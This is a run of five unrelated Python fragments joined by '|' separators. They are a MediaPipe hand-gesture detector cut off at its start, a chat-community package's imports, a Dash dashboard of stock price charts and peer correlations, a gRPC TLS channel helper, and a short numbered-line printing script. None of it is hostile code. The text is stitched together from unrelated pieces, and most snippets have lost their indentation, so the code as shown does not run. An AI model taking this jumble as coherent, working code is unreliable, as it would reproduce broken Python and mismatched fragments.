# If loading a video, use 'break' instead of 'continue'.
continue
image_height, image_width, _ = image.shape
# Flip the image horizontally for a later selfie-view display, and convert
# the BGR image to RGB.
image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB)
# To improve performance, optionally mark the image as not writeable to
# pass by reference.
image.flags.writeable = False
results = hands.process(image)
# Draw the hand annotations on the image.
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
gesture = False;
if results.multi_hand_landmarks:
hand_landmarks = results.multi_hand_landmarks[0]
mp_drawing.draw_landmarks(
image, hand_landmarks, mp_hands.HAND_CONNECTIONS)
#get the finger tip coordinates we are interested in
index_x = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].x * image_width
index_y = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].y * image_height
index_dip = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_DIP].y * image_height
thumb_x = hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].x * image_width
thumb_y = hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].y * image_height
middle_x = hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].x * image_width
middle_y = hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].y * image_height
knuckle_x = hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_MCP].x * image_width
knuckle_y = hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_MCP].y * image_height
ring_y = hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_TIP].y * image_height
pinky_y = hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_TIP].y * image_height
if (results.multi_handedness[0].classification[0].label == "Right"):
key_x = min(knuckle_x, middle_x)
else:
key_x = max(knuckle_x, middle_x)
      clenched = (pinky_y > knuckle_y) and (middle_y > knuckle_y) and (ring_y > knuckle_y)
gesture = (abs(key_x - thumb_x) > abs(index_y - knuckle_y)/1.7) and clenched\
and (index_dip > index_y)
#print('Handedness:', results.multi_handedness[0].classification[0].label)
if gesture:
print("gesture")
else:
print("no gesture")
cv2.imshow('MediaPipe Hands', image)
if cv2.waitKey(5) & 0xFF == 27:
break
cap.release()
|
from .community_chat import CommunityChat
from .group_community import GroupCommunity
from .group_rules import GroupRules
from .invite_link import (InviteLink, INVITE_LINK_REGEX,
INVITE_LINK_MAX_LENGTH)
from .member import Member
|
# -*- coding: utf-8 -*-
import os
import flask
import functools
import dash
import pyEX.client as p
import json
from dash.dependencies import Input, Output, State
import dash_core_components as dcc
import dash_html_components as html
from perspective_dash_component import PerspectiveDash
c = p.Client()
def peerCorrelation(client, symbol, timeframe='6m'):
peers = client.peers(symbol)
rets = client.batchDF(peers + [symbol], 'chart', timeframe)['chart']
ret = rets.pivot(columns='symbol', values='changePercent').corr()
ret.index.name = 'symbol'
ret.columns = ret.columns.tolist()
return ret
################################
# Helpers to cache data lookup #
@functools.lru_cache(100)
def fetch_data(value):
return c.chartDF(value, '6m').to_dict(orient='records')
@functools.lru_cache(100)
def fetch_corr_data(value):
df = peerCorrelation(c, value)
df.index.name = 'symbols'
return df.index.tolist(), df.reset_index().to_dict(orient='records')
################################
################
# Default data #
symbols = c.symbols()
default_data = fetch_data('JPM')
default_data2 = fetch_corr_data('JPM')
default_data2cols, default_data2data = default_data2
################
################
# dash
server = flask.Flask(__name__)
app = dash.Dash(__name__, server=server)
################
################
# layout
app.layout = html.Div(children=[
html.H1(children='Perspective Demo', style={'textAlign': 'center'}),
dcc.Dropdown(id='tickerinput', value='JPM', options=[{'label': s['symbol'] + ' - ' + s['name'], 'value': s['symbol']} for s in symbols]),
PerspectiveDash(id='psp1', data=default_data, view='y_line', columns=['open', 'high', 'low', 'close']),
html.Div(children=[
PerspectiveDash(id='psp2', data=default_data),
PerspectiveDash(id='psp3', data=default_data2data, view='heatmap', columns=default_data2cols, rowpivots=['symbols'])],
style={'width': '100%', 'display': 'flex', 'flex-direction': 'row'}),
html.Div(id='intermediate-value', style={'display': 'none'})
],
style={'height': '100%', 'width': '100%', 'display': 'flex', 'flex-direction': 'column'})
################
################
# callbacks
@app.callback(Output('intermediate-value', 'children'), [Input('tickerinput', 'value')])
def fetch_new_data(value):
return json.dumps(fetch_data(value))
@app.callback(Output('psp1', 'data'), [Input('intermediate-value', 'children')])
def update_psp1(value):
return json.loads(value)
@app.callback(Output('psp2', 'data'), [Input('intermediate-value', 'children')])
def update_psp2(value):
return json.loads(value)
# Data
@app.callback(Output('psp3', 'data'), [Input('tickerinput', 'value')])
def update_psp3data(value):
return fetch_corr_data(value)[1]
# Columns
@app.callback(Output('psp3', 'columns'), [Input('tickerinput', 'value')])
def update_psp3cols(value):
return fetch_corr_data(value)[0]
################
################
# Run
if __name__ == "__main__":
port = os.environ.get('PORT')
# heroku
if port: app.run_server(port=port, debug=False, threaded=True)
else: app.run_server(debug=True, threaded=True)
|
from urllib.parse import urlparse, ParseResult
import grpc
def create_channel(hostname, port, ca=None, key=None, cert=None):
    # Build either a plaintext or a TLS channel straight from the "host:port" target;
    # grpc.secure_channel takes the target string, not an existing channel.
    target = f'{hostname}:{port}'
    if ca:
        return _create_tls_channel(target, ca, key, cert)
    return _create_tcp_channel(target)
def _create_tcp_channel(target):
    return grpc.insecure_channel(target)
def _create_tls_channel(target, ca, key=None, cert=None):
    # ca/key/cert may be given either as file paths or as raw PEM bytes
    if isinstance(ca, str):
        with open(ca, 'rb') as f_in:
            ca = f_in.read()
    if key and isinstance(key, str):
        with open(key, 'rb') as f_in:
            key = f_in.read()
    if cert and isinstance(cert, str):
        with open(cert, 'rb') as f_in:
            cert = f_in.read()
    return grpc.secure_channel(
        target,
        grpc.ssl_channel_credentials(ca, key, cert)
    )
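# Example call (hypothetical host, port and certificate path):
#   channel = create_channel('localhost', 50051, ca='certs/ca.pem')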
|
#!/usr/bin/env python
# coding: utf-8
# In[13]:
n = int(input())
a = 0
for _ in range(n):
a, b, c = a+1, a+2, a+3
print('{} {} {} PUM'.format(a, b, c))
a = c+1
|